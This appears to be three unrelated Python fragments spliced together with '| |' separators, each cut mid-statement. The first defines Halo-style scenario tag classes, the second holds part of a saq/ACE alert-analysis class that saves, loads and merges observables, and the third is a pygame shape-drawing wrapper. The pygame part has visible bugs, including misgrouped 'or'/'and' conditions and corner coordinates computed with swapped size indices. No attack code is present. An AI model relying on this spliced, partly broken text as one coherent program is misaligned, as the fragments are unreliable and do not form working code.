self.ai_animation_references_tag_block = ai_animation_references_tag_block
self.ai_script_references_tag_block = ai_script_references_tag_block
self.ai_recording_references_tag_block = ai_recording_references_tag_block
self.ai_conversations_tag_block = ai_conversations_tag_block
self.script_syntax_data_tag_data = script_syntax_data_tag_data
self.script_string_data_tag_data = script_string_data_tag_data
self.scripts_tag_block = scripts_tag_block
self.globals_tag_block = globals_tag_block
self.references_tag_block = references_tag_block
self.source_files_tag_block = source_files_tag_block
self.scripting_data_tag_block = scripting_data_tag_block
self.cutscene_flags_tag_block = cutscene_flags_tag_block
self.cutscene_camera_points_tag_block = cutscene_camera_points_tag_block
self.cutscene_titles_tag_block = cutscene_titles_tag_block
self.custom_object_names_tag_ref = custom_object_names_tag_ref
self.chapter_title_text_tag_ref = chapter_title_text_tag_ref
self.hud_messages_tag_ref = hud_messages_tag_ref
self.structure_bsps_tag_block = structure_bsps_tag_block
self.scenario_resources_tag_block = scenario_resources_tag_block
self.old_structure_physics_tag_block = old_structure_physics_tag_block
self.hs_unit_seats_tag_block = hs_unit_seats_tag_block
self.scenario_kill_triggers_tag_block = scenario_kill_triggers_tag_block
self.hs_syntax_datums_tag_block = hs_syntax_datums_tag_block
self.orders_tag_block = orders_tag_block
self.triggers_tag_block = triggers_tag_block
self.background_sound_palette_tag_block = background_sound_palette_tag_block
self.sound_environment_palette_tag_block = sound_environment_palette_tag_block
self.weather_palette_tag_block = weather_palette_tag_block
self.unused_0_tag_block = unused_0_tag_block
self.unused_1_tag_block = unused_1_tag_block
self.unused_2_tag_block = unused_2_tag_block
self.unused_3_tag_block = unused_3_tag_block
self.scavenger_hunt_objects_tag_block = scavenger_hunt_objects_tag_block
self.scenario_cluster_data_tag_block = scenario_cluster_data_tag_block
self.salt_array = salt_array
self.spawn_data_tag_block = spawn_data_tag_block
self.sound_effect_collection_tag_ref = sound_effect_collection_tag_ref
self.crates_tag_block = crates_tag_block
self.crate_palette_tag_block = crate_palette_tag_block
self.global_lighting_tag_ref = global_lighting_tag_ref
self.atmospheric_fog_palette_tag_block = atmospheric_fog_palette_tag_block
self.planar_fog_palette_tag_block = planar_fog_palette_tag_block
self.flocks_tag_block = flocks_tag_block
self.subtitles_tag_ref = subtitles_tag_ref
self.decorators_tag_block = decorators_tag_block
self.creatures_tag_block = creatures_tag_block
self.creature_palette_tag_block = creature_palette_tag_block
self.decorator_palette_tag_block = decorator_palette_tag_block
self.bsp_transition_volumes_tag_block = bsp_transition_volumes_tag_block
self.structure_bsp_lighting_tag_block = structure_bsp_lighting_tag_block
self.editor_folders_tag_block = editor_folders_tag_block
self.level_data_tag_block = level_data_tag_block
self.game_engine_strings_tag_ref = game_engine_strings_tag_ref
self.mission_dialogue_tag_block = mission_dialogue_tag_block
self.objectives_tag_ref = objectives_tag_ref
self.interpolators_tag_block = interpolators_tag_block
self.shared_references_tag_block = shared_references_tag_block
self.screen_effect_references_tag_block = screen_effect_references_tag_block
self.simulation_definition_table_tag_block = simulation_definition_table_tag_block
class ObjectName:
def __init__(self, name="", object_type=0, placement_index=0):
self.name = name
self.object_type = object_type
self.placement_index = placement_index
class Object:
def __init__(self, palette_index=0, name_index=0, placement_flags=0, position=Vector(), rotation=Euler(), scale=0.0, transform_flags=0, manual_bsp_flags=0, unique_id=0,
origin_bsp_index=0, object_type=0, source=0, bsp_policy=0, editor_folder_index=0):
self.palette_index = palette_index
self.name_index = name_index
self.placement_flags = placement_flags
self.position = position
self.rotation = rotation
self.scale = scale
self.transform_flags = transform_flags
self.manual_bsp_flags = manual_bsp_flags
self.unique_id = unique_id
self.origin_bsp_index = origin_bsp_index
self.object_type = object_type
self.source = source
self.bsp_policy = bsp_policy
self.editor_folder_index = editor_folder_index
class Scenery(Object):
def __init__(self, sobj_header=None, obj0_header=None, sper_header=None, sct3_header=None, variant_name_length=0, variant_name="", active_change_colors=0,
primary_color_BGRA=(0.0, 0.0, 0.0, 1.0), secondary_color_BGRA=(0.0, 0.0, 0.0, 1.0), tertiary_color_BGRA=(0.0, 0.0, 0.0, 1.0),
quaternary_color_BGRA=(0.0, 0.0, 0.0, 1.0), pathfinding_policy=0, lightmap_policy=0, pathfinding_references_header=None, pathfinding_references=None,
valid_multiplayer_games=0):
super().__init__()
self.sobj_header = sobj_header
self.obj0_header = obj0_header
self.sper_header = sper_header
self.sct3_header = sct3_header
self.variant_name_length = variant_name_length
self.variant_name = variant_name
self.active_change_colors = active_change_colors
self.primary_color_BGRA = primary_color_BGRA
self.secondary_color_BGRA = secondary_color_BGRA
self.tertiary_color_BGRA = tertiary_color_BGRA
self.quaternary_color_BGRA = quaternary_color_BGRA
self.pathfinding_policy = pathfinding_policy
self.lightmap_policy = lightmap_policy
self.pathfinding_references_header = pathfinding_references_header
self.pathfinding_references = pathfinding_references
self.valid_multiplayer_games = valid_multiplayer_games
class Unit(Object):
def __init__(self, sobj_header=None, obj0_header=None, sper_header=None, sunt_header=None,variant_name_length=0, variant_name="", active_change_colors=0,
primary_color_BGRA=(0.0, 0.0, 0.0, 1.0), secondary_color_BGRA=(0.0, 0.0, 0.0, 1.0), tertiary_color_BGRA=(0.0, 0.0, 0.0, 1.0),
quaternary_color_BGRA=(0.0, 0.0, 0.0, 1.0), body_vitality=0.0, flags=0):
super().__init__()
self.sobj_header = sobj_header
self.obj0_header = obj0_header
self.sper_header = sper_header
self.sunt_header = sunt_header
self.variant_name_length = variant_name_length
self.variant_name = variant_name
self.active_change_colors = active_change_colors
self.primary_color_BGRA = primary_color_BGRA
self.secondary_color_BGRA = secondary_color_BGRA
self.tertiary_color_BGRA = tertiary_color_BGRA
self.quaternary_color_BGRA = quaternary_color_BGRA
self.body_vitality = body_vitality
self.flags = flags
class Equipment(Object):
def __init__(self, sobj_header=None, obj0_header=None, seqt_header=None, flags=0):
super().__init__()
self.sobj_header = sobj_header
self.obj0_header = obj0_header
self.seqt_header = seqt_header
self.flags = flags
class Weapon(Object):
def __init__(self, sobj_header=None, obj0_header=None, sper_header=None, swpt_header=None, variant_name_length=0, variant_name="", active_change_colors=0,
primary_color_BGRA=(0.0, 0.0, 0.0, 1.0), secondary_color_BGRA=(0.0, 0.0, 0.0, 1.0), tertiary_color_BGRA=(0.0, 0.0, 0.0, 1.0),
quaternary_color_BGRA=(0.0, 0.0, 0.0, 1.0), rounds_left=0, rounds_loaded=0, flags=0):
super().__init__()
self.sobj_header = sobj_header
self.obj0_header = obj0_header
self.sper_header = sper_header
self.swpt_header = swpt_header
self.variant_name_length = variant_name_length
self.variant_name = variant_name
self.active_change_colors = active_change_colors
self.primary_color_BGRA = primary_color_BGRA
self.secondary_color_BGRA = secondary_color_BGRA
self.tertiary_color_BGRA = tertiary_color_BGRA
self.quaternary_color_BGRA = quaternary_color_BGRA
self.rounds_left = rounds_left
self.rounds_loaded = rounds_loaded
self.flags = flags
class DeviceMachine(Object):
def __init__(self, sobj_header=None, obj0_header=None, sdvt_header=None, smht_header=None, power_group_index=0, position_group_index=0, flags_0=0,
flags_1=0, pathfinding_references_header=None, pathfinding_references=None):
super().__init__()
self.sobj_header = sobj_header
self.obj0_header = obj0_header
self.sdvt_header = sdvt_header
self.smht_header = smht_header
self.power_group_index = power_group_index
self.position_group_index = position_group_index
self.flags_0 = flags_0
self.flags_1 = flags_1
self.pathfinding_references_header = pathfinding_references_header
self.pathfinding_references = pathfinding_references
class LightVolume(Object):
def __init__(self, sobj_header=None, obj0_header=None, sdvt_header=None, slit_header=None, power_group_index=0, position_group_index=0, flags_0=0,
shape_type=0, flags_1=0, lightmap_type=0, lightmap_flags=0, lightmap_half_life=0.0, lightmap_light_scale=0.0, target_point=Vector(), width=0.0,
height_scale=0.0, field_of_view=0.0, falloff_distance=0.0, cutoff_distance=0.0):
super().__init__()
self.sobj_header = sobj_header
self.obj0_header = obj0_header
self.sdvt_header = sdvt_header
self.slit_header = slit_header
self.power_group_index = power_group_index
self.position_group_index = position_group_index
self.flags_0 = flags_0
self.shape_type = shape_type
self.flags_1 = flags_1
self.lightmap_type | |
observable {} ({}) [{}] <{}> for {} ({}) [{}] <{}>".format(o, id(o), o.id, o.type, observable, id(observable), observable.id, observable.type))
return o
observable.root = self
self.observable_store[observable.id] = observable
logging.debug("recorded observable {} with id {}".format(observable, observable.id))
self.set_modified()
return observable
def record_observable_by_spec(self, o_type, o_value, o_time=None):
"""Records the given observable into the observable_store if it does not already exist.
Returns the new one if recorded or the existing one if not."""
from saq.observables import create_observable
assert isinstance(o_type, str)
assert isinstance(self.observable_store, dict)
assert o_time is None or isinstance(o_time, datetime.datetime)
# create a temporary object to make use of any defined custom __eq__ ops
observable = create_observable(o_type, o_value, o_time=o_time)
if observable is None:
return None
return self.record_observable(observable)
def schedule(self, exclusive_uuid=None):
"""See saq.database.add_workload."""
from saq.database import add_workload
add_workload(self, exclusive_uuid=exclusive_uuid)
def save(self):
"""Saves the Alert to disk. Resolves AttachmentLinks into Attachments. Note that this does not insert the Alert into the system."""
assert self.json_path is not None
assert self.json is not None
logging.debug("SAVE: {} ({})".format(self, type(self)))
# make sure the containing directory exists
if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir)):
os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir))
# analysis details go into a hidden directory
if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace')):
os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace'))
# save all analysis
for analysis in self.all_analysis:
if analysis is not self:
analysis.save()
# save our own details
Analysis.save(self)
# now the rest should encode as JSON with the custom JSON encoder
try:
# we use a temporary file to deal with very large JSON files taking a long time to encode
# if we don't do this then the GUI will occasionally hit 0-byte data.json files
temp_path = '{}.tmp'.format(self.json_path)
with open(temp_path, 'w') as fp:
fp.write(_JSONEncoder().encode(self))
_track_writes()
shutil.move(temp_path, self.json_path)
except Exception as e:
logging.error("json encoding for {0} failed: {1}".format(self, str(e)))
report_exception()
return False
return True
def load(self):
"""Loads the Alert object from the JSON file. Note that this does NOT load the details property."""
assert self.json_path is not None
logging.debug("LOAD: called load() on {}".format(self))
if self.is_loaded:
logging.warning("alert {} already loaded".format(self))
try:
with open(self.json_path, 'r') as fp:
self.json = json.load(fp)
_track_reads()
# translate the json into runtime objects
self._materialize()
self.is_loaded = True
# loaded Alerts are read-only until something is modified
self._ready_only = True
return True
except Exception as e:
logging.error("unable to load json from {0}: {1}".format(
self.json_path, str(e)))
report_exception()
raise e
def flush(self):
"""Calls Analysis.flush on all Analysis objects in this RootAnalysis."""
#logging.debug("called RootAnalysis.flush() on {}".format(self))
#Analysis.flush(self) # <-- we don't want to flush out the RootAnalysis details
# make sure the containing directory exists
if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir)):
os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir))
# analysis details go into a hidden directory
if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace')):
os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace'))
for analysis in self.all_analysis:
if analysis is not self:
analysis.flush()
freed_items = gc.collect()
#logging.debug("{} items freed by gc".format(freed_items))
def merge(self, target_analysis, other):
"""Merges the Observables and Analysis of an existing RootAnalysis into the target Analysis object."""
assert isinstance(target_analysis, Analysis)
assert isinstance(other, RootAnalysis)
logging.debug("merging {} into {} target {}".format(other, self, target_analysis))
# maps the observables from the other alert to new ones in this one
transfer_map = {} # key = uuid of other observable, value = uuid of the new observable
# go through and copy all the observations over first
for other_observable in other.all_observables:
# does this observation already exist?
existing_observable = self.get_observable_by_spec(other_observable.type,
other_observable.value,
other_observable.time)
if existing_observable:
target_observable = existing_observable
logging.debug("merging existing observable {}".format(target_observable))
else:
# NOTE that here we don't want to actually add this other observable
# because it has references to Analysis objects we need to add below
# so we create a new one based on this one
logging.debug("making copy of {}".format(other_observable))
target_observable = copy.copy(other_observable)
target_observable.clear_analysis() # make sure these are cleared out (we'll add them back in later...)
# note that we use the record_observable here instead of add_observable
# we're just moving them over into this RootAnalysis right now
target_observable = self.record_observable(target_observable)
# if the observable is a file then the actual file needs to be copied over
# TODO this should go into the functionality of the observable class
if target_observable.type == F_FILE:
src_path = os.path.join(other.storage_dir, other_observable.value)
if not os.path.exists(src_path):
logging.error("merge for {} has missing file {}".format(other, src_path))
else:
dest_dir = os.path.join(self.storage_dir, os.path.dirname(other_observable.value))
dest_path = os.path.join(dest_dir, os.path.basename(other_observable.value))
try:
logging.debug("copying merged file observable {} to {}".format(src_path, dest_path))
if not os.path.isdir(dest_dir):
os.makedirs(dest_dir)
shutil.copy(src_path, dest_path)
except Exception as e:
logging.error("unable to copy {} to {}: {}".format(src_path, dest_path, e))
report_exception()
# keep track of how they are moving over
transfer_map[other_observable.id] = target_observable.id
for other_observable in other.all_observables:
# find the corresponding observable in this alert
target_observable = self.get_observable_by_spec(other_observable.type,
other_observable.value,
other_observable.time)
if target_observable is None:
logging.error("could not find target observable {} in {}".format(other_observable, self))
continue
# remap relationships
for r in target_observable.relationships:
if r.target.id in transfer_map:
logging.debug("re-targeting {}".format(r))
r.target = self.get_observable_by_spec(other.observable_store[r.target.id].type,
other.observable_store[r.target.id].value,
other.observable_store[r.target.id].time)
for other_analysis in other_observable.all_analysis:
# do we already have this analysis for this observable in the target?
existing_analysis = target_observable.get_analysis(type(other_analysis))
if existing_analysis is None:
logging.debug("merging analysis {} into {}".format(other_analysis, target_observable))
details = other_analysis.details
new_analysis = copy.copy(other_analysis)
new_analysis.clear_observables()
new_analysis.external_details_path = None
new_analysis.external_details_loaded = False
new_analysis.external_details = None
new_analysis.details = details
new_analysis.set_modified()
#new_analysis = type(other_analysis)()
#new_analysis.details = other_analysis.details
target_observable.add_analysis(new_analysis)
# and then copy all the observables in
for o in other_analysis.observables:
# find the corresponding observable in this root
current_observable = self.get_observable_by_spec(o.type, o.value, o.time)
if current_observable is None:
logging.error("could not find current observable {} in {} for {}".format(
o, self, other_analysis))
else:
new_analysis.add_observable(current_observable)
else:
logging.debug("skipping merge for existing analysis {}".format(existing_analysis))
# finally, all the observables in the RootAnalysis object get added to the target_analysis
for other_observable in other.observables:
existing_observable = self.get_observable_by_spec(other_observable.type,
other_observable.value,
other_observable.time)
if existing_observable is None:
logging.error("cannot find observable type {} value {} time {}".format(other_observable.type,
other_observable.value,
other_observable.time))
else:
target_analysis.add_observable(existing_observable)
def _materialize(self):
"""Utility function to replace specific dict() in json with runtime object references."""
# in other words, load the JSON
self._load_observable_store()
# load the Analysis objects in the Observables
for observable in self.observable_store.values():
observable._load_analysis()
# load the Observable references in the Analysis objects
for analysis in self.all_analysis:
analysis._load_observable_references()
# load Tag objects for analysis
for analysis in self.all_analysis:
analysis.tags = [Tag(json=t) for t in analysis.tags]
# load Tag objects for observables
for observable in self.observable_store.values():
observable.tags = [Tag(json=t) for t in observable.tags]
# load DetectionPoints
for analysis in self.all_analysis:
analysis.detections = [DetectionPoint.from_json(dp) for dp in analysis.detections]
for observable in self.all_observables:
observable.detections = [DetectionPoint.from_json(dp) for dp in observable.detections]
# load Relationships
for observable in self.all_observables:
observable._load_relationships()
# load dependency tracking
_buffer = []
for dep_dict in self.dependency_tracking:
_buffer.append(AnalysisDependency.from_json(dep_dict))
#_buffer.append(AnalysisDependency(dep_dict[AnalysisDependency.KEY_TARGET_OBSERVABLE_ID],
#dep_dict[AnalysisDependency.KEY_TARGET_ANALYSIS_TYPE],
#dep_dict[AnalysisDependency.KEY_SOURCE_OBSERVABLE_ID],
#dep_dict[AnalysisDependency.KEY_SOURCE_ANALYSIS_TYPE],
#dep_dict[AnalysisDependency.KEY_DEPENDENCY_FAILED]))
for dep in _buffer:
dep.root = self
self.dependency_tracking = _buffer
for dep in self.dependency_tracking:
self.link_dependencies(dep)
def _load_observable_store(self):
from saq.observables import create_observable
invalid_uuids = [] # list of uuids that don't load for whatever reason
for uuid in self.observable_store.keys():
# get the JSON dict from the observable store for this uuid
value = self.observable_store[uuid]
# create the observable from the type and value
o = create_observable(value['type'], value['value'])
# basically this is backwards compatibility with old alerts that have invalid values for observables
if o:
o.root = self
o.json = value # this sets everything else
# set up the EVENT_GLOBAL_* events
o.add_event_listener(EVENT_ANALYSIS_ADDED, o.root._fire_global_events)
o.add_event_listener(EVENT_TAG_ADDED, o.root._fire_global_events)
self.observable_store[uuid] = o
else:
logging.warning("invalid observable type {} value {}".format(value['type'], value['value']))
invalid_uuids.append(uuid)
for uuid in invalid_uuids:
del self.observable_store[uuid]
def reset(self):
"""Removes analysis, dispositions and any observables that did not originally come with the alert."""
from saq.database import acquire_lock, release_lock, LockedException
lock_uuid = None
try:
lock_uuid = acquire_lock(self.uuid)
if not lock_uuid:
raise LockedException(self)
return self._reset()
finally:
if lock_uuid:
release_lock(self.uuid, lock_uuid)
def _reset(self):
from subprocess import Popen
self.set_modified()
logging.info("resetting {}".format(self))
# NOTE that we do not clear the details that came with Alert
# clear external details storage for all analysis (except self)
for _analysis in self.all_analysis:
if _analysis is self:
continue
_analysis.reset()
# remove analysis objects from all observables
for o in self.observables:
o.clear_analysis()
# remove observables from the observable_store | |
fps == "MAX":fps = 1000
elif fps == "MIN":fps = 30
else:
print(colorama.Fore.RED+'Error'+colorama.Fore.RESET)
print(colorama.Fore.YELLOW+'None fps'+colorama.Fore.RESET)
sys.exit()
self.clock.tick(fps)
def GET_INIT(self):
return pygame.display.get_init()
def GET_DISPLAY_DRIVER(self):
return pygame.display.get_driver()
def GET_TOP(self,cor='X',storona='left'):
if cor=='X' or cor=='x' and storona=='left':return 0
elif cor=='X' or cor=='x' and storona=='right':return self.screen.get_width()
elif cor=='Y' or cor=='y' and storona=='left':return 0
elif cor=='Y' or cor=='y' and storona=='right':return 0
else:
print(colorama.Fore.RED+'Error'+colorama.Fore.RESET)
print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET)
print(colorama.Fore.YELLOW+'Uses left or fight'+colorama.Fore.RESET)
sys.exit()
def GET_DOWN(self,cor='X',storona='left'):
if cor=='X' or cor=='x' and storona=='left':return 0
elif cor=='X' or cor=='x' and storona=='right':return self.screen.get_width()
elif cor=='Y' or cor=='y' and storona=='left':return self.screen.get_height()
elif cor=='Y' or cor=='y' and storona=='right':return self.screen.get_height()
else:
print(colorama.Fore.RED+'Error'+colorama.Fore.RESET)
print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET)
print(colorama.Fore.YELLOW+'Uses left or fight'+colorama.Fore.RESET)
sys.exit()
def GET_LEFT(self,cor='X',storona='up'):
if cor=='X' or cor=='x' and storona=='up':return 0
elif cor=='X' or cor=='x' and storona=='down':return 0
elif cor=='Y' or cor=='y' and storona=='up':return 0
elif cor=='Y' or cor=='y' and storona=='down':return self.screen.get_height()
else:
print(colorama.Fore.RED+'Error'+colorama.Fore.RESET)
print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET)
print(colorama.Fore.YELLOW+'Uses up or down'+colorama.Fore.RESET)
sys.exit()
def GET_RIGHT(self,cor='X',storona='up'):
if cor=='X' or cor=='x' and storona=='up':return self.screen.get_width()
elif cor=='X' or cor=='x' and storona=='down':return self.screen.get_width()
elif cor=='Y' or cor=='y' and storona=='up':return 0
elif cor=='Y' or cor=='y' and storona=='down':return self.screen.get_height()
else:
print(colorama.Fore.RED+'Error'+colorama.Fore.RESET)
print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET)
print(colorama.Fore.YELLOW+'Uses up or down'+colorama.Fore.RESET)
sys.exit()
def GET_FPS(self):return int(self.clock.get_fps())
def CLOSE(self,running=True,EXIT_BUTTON='esc'):
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
events = pygame.event.get()
pygame_widgets.update(events)
if keyboard.is_pressed(EXIT_BUTTON):
sys.exit()
return running
def EXIT(self,EXIT_BUTTON='esc'):
if keyboard.is_pressed(EXIT_BUTTON):
sys.exit()
def GET_WIN_SIZE(self):
return self.screen.get_size()
def GET_WIN_WIDTH(self):
return self.screen.get_size()[0]
def GET_WIN_HEIGHT(self):
return self.screen.get_size()[1]
def GET_EVENT(self):
events = pygame.event.get()
return events
def FUNCTION(self,functions=[]):
for i in range(len(functions)):
functions[i]()
def GET_GL_FUNCTIONS(self):
print(colorama.Fore.GREEN+'GL_FUNCTIONS---')
print('''
Draw f- D-none
Obv f- O-(rrr)(ggg)(bbb)-THICKNESS
DrOb f- OD-(rrr)(ggg)(bbb)-THICKNESS
'''+colorama.Fore.RESET)
def UPDATE_SCREEN(self):
self.width = self.screen.get_width()
self.height = self.screen.get_height()
class UPDATE():
def __init__(self):
pygame.display.flip()
def GETTIME(self):
global start_time
start_time+=1
return start_time
def SETBGCOLOR(self,col='white'):
screen.fill(col)
class GL:
def __init__(self):
pass
class Rect:
def __init__(self,COLOR=(),POSITION=[],SIZE=[],THICKNESS=0,SURF=None,FUNCTION='none'):
sh2 = 1
center = [POSITION[0] + SIZE[0]/2,POSITION[1]+SIZE[1]/2]
pos=[POSITION[0],POSITION[1]]
up = [POSITION[0],POSITION[1]]
down = [POSITION[0]+SIZE[1],POSITION[1]+SIZE[0]]
right = [POSITION[0]+SIZE[1],POSITION[1]+SIZE[0]]
left = [POSITION[0],POSITION[1]]
self.pos = pos
self.size = SIZE
if SURF=='s' and type(SURF)==str:self.surf = screen
else:self.surf = SURF
self.col = COLOR
self.obv_color = 'black'
self.sh = THICKNESS
self.sh2 = sh2
self.center = center
self.up = up
self.down = down
self.left = left
self.right = right
self.DL_diagonal = math.sqrt(SIZE[0]**2+SIZE[1]**2)
if FUNCTION=='D':
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.rect(self.surf,self.col,rect,self.sh)
elif FUNCTION[1]=='D':
col = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])]
sh2 = int(FUNCTION[15:len(FUNCTION)])
if col!=None:self.obv_color = col
if sh2!=None:self.sh2 = sh2
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.rect(self.surf,self.col,rect,self.sh)
pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2)
elif FUNCTION[0]=='O':
col = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])]
sh2 = int(FUNCTION[14:len(FUNCTION)])
if col!=[0,0,0]:self.obv_color = col
if sh2!=None:self.sh2 = sh2
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2)
else:
pass
def FILL(self):
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.rect(self.surf,self.col,rect,self.sh)
def FILLOUT(self,COLOR=None,THICKNESS=None):
if COLOR!=None:self.obv_color = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.rect(self.surf,self.col,rect,self.sh)
pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2)
def OUTLINE(self,COLOR=None,THICKNESS=None):
if COLOR!=None:self.obv_color = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2)
def SET_SIZE(self,SIZE=[]):
self.size = SIZE
def SET_THICKNESS(self,THICKNESS):
self.sh = THICKNESS
def SET_COLOR(self,COLOR=()):
self.col = COLOR
def GET_SIZE(self):
return self.size
def GET_THICKNESS(self):
return self.sh
def SET_OUTLINE_THICKNESS(self,THICKNESS):
self.sh2=THICKNESS
def GET_CENTER(self):
return self.center
def GET_SURF(self):
return self.surf
def GET_OUTLINE_THICKNESS(self):
return self.sh2
def SET_POSITION(self,POSITION):
self.pos = POSITION
up = [self.pos[0],self.pos[1]]
down = [self.pos[0]+self.size[1],self.pos[1]+self.size[0]]
right = [self.pos[0]+self.size[1],self.pos[1]+self.size[0]]
left = [self.pos[0],self.pos[1]]
self.up = up
self.down = down
self.left = left
self.right = right
def GET_POSITION(self):
return self.pos
class Poligon:
def __init__(self,COLOR=(),POINTS=(),THICKNESS=0,SURF=None,FUNCTION='none'):
self.points = POINTS
self.col = COLOR
self.sh = THICKNESS
self.sh2 = 1
if SURF=='s' and type(SURF)==str:self.surf=screen
else:self.surf = SURF
self.obv_col = 'black'
if FUNCTION=='D':
pygame.draw.polygon(self.surf,self.col,self.points,self.sh)
elif FUNCTION[1]=='D':
COLOR = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])]
THICKNESS = int(FUNCTION[15:len(FUNCTION)])
pygame.draw.polygon(self.surf,self.col,self.points,self.sh)
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2)
elif FUNCTION[0]=='O':
COLOR = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])]
THICKNESS = int(FUNCTION[14:len(FUNCTION)])
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2)
else:
pass
def FILL(self):
pygame.draw.polygon(self.surf,self.col,self.points,self.sh)
def OUTLINE(self,COLOR=None,THICKNESS=None):
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2)
def FILLOUT(self,COLOR=None,THICKNESS=None):
pygame.draw.polygon(self.surf,self.col,self.points,self.sh)
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2)
def GET_POINTS(self):
return self.points
def GET_COLOR(self):
return self.col
def GET_OUTLINE_COLOR(self):
return self.obv_col
def GET_THICKNESS(self):
return self.sh
def GET_OUTLINE_THICKNESS(self):
return self.sh2
def GET_SURF(self):
return self.surf
def SET_THICKNESS(self,THICKNESS):
self.sh = THICKNESS
def SET_OUTLINE_THICKNESS(self,THICKNESS):
self.sh2 = THICKNESS
def SET_OUTLINE_COLOR(self,COLOR=()):
self.obv_col = COLOR
def SET_COLOR(self,COLOR=()):
self.col = COLOR
class Circle:
def __init__(self,COLOR=(),POSITION=[],RADIUS=0,THICKNESS=0,SURF=0,FUNCTION='none'):
global g_c_pos , g_c_rad
center = [POSITION[0],POSITION[1]]
sh2 = 1
self.sh2 = sh2
self.col = COLOR
self.sh = THICKNESS
self.rad = RADIUS ; g_c_rad = self.rad
self.obv_col = (0,0,0)
if SURF=='s' and type(SURF)==str:self.surf=screen
else:self.surf = SURF
self.center = center
self.pos = POSITION ; g_e_pos = self.pos
up_cic = [POSITION[0],POSITION[1]-self.rad] ; self.up = up_cic
down_cic = [POSITION[0],POSITION[1]+self.rad] ; self.down = down_cic
left_cic = [POSITION[0]-self.rad,POSITION[1]] ; self.left = left_cic
right_cic = [POSITION[0]+self.rad,POSITION[1]] ; self.right = right_cic
if FUNCTION=='D':
pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh)
elif FUNCTION[1]=='D':
COLOR = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])]
THICKNESS = int(FUNCTION[15:len(FUNCTION)])
pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh)
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.circle(self.surf,COLOR,(self.pos[0],self.pos[1]),self.rad,self.sh2)
elif FUNCTION[0]=='O':
COLOR = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])]
THICKNESS = int(FUNCTION[14:len(FUNCTION)])
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.circle(self.surf,COLOR,(self.pos[0],self.pos[1]),self.rad,self.sh2)
else:
pass
def FILL(self):
global g_c_pos
if g_c_pos!=None:self.pos = g_c_pos
pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh)
def OUTLINE(self,COLOR=None,THICKNESS=None):
global g_c_pos
if g_c_pos!=None:self.pos = g_c_pos
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.circle(self.surf,self.obv_col,(self.pos[0],self.pos[1]),self.rad,self.sh2)
def FILLOUT(self,COLOR=None,THICKNESS=None):
global g_c_pos
if g_c_pos!=None:self.pos = g_c_pos
pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh)
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.circle(self.surf,self.obv_col,(self.pos[0],self.pos[1]),self.rad,self.sh2)
def SET_RADIUS(self,RADIUS):
self.rad = RADIUS
def SET_COLOR(self,COLOR=()):
self.col = COLOR
def GET_RADIUS(self):
return self.rad
def GET_THICKNESS(self):
return self.sh
def GET_CENTER(self):
return self.center
def GET_SURF(self):
return self.surf
def SET_OUTLINE_THICKNESS(self,sh2):
self.sh2 = sh2
def SET_THICKNESS(self,THICKNESS):
self.sh=THICKNESS
def GET_OUTLINE_THICKNESS(self):
return self.sh2
class SET_POSITION():
def __init__(self,POSITION=[]):
global g_c_rad , g_c_pos
self.POSITION = POSITION
g_c_pos = [POSITION[0]+g_c_rad, POSITION[1]+g_c_rad]
up_cic = [POSITION[0],POSITION[1]-g_c_rad]
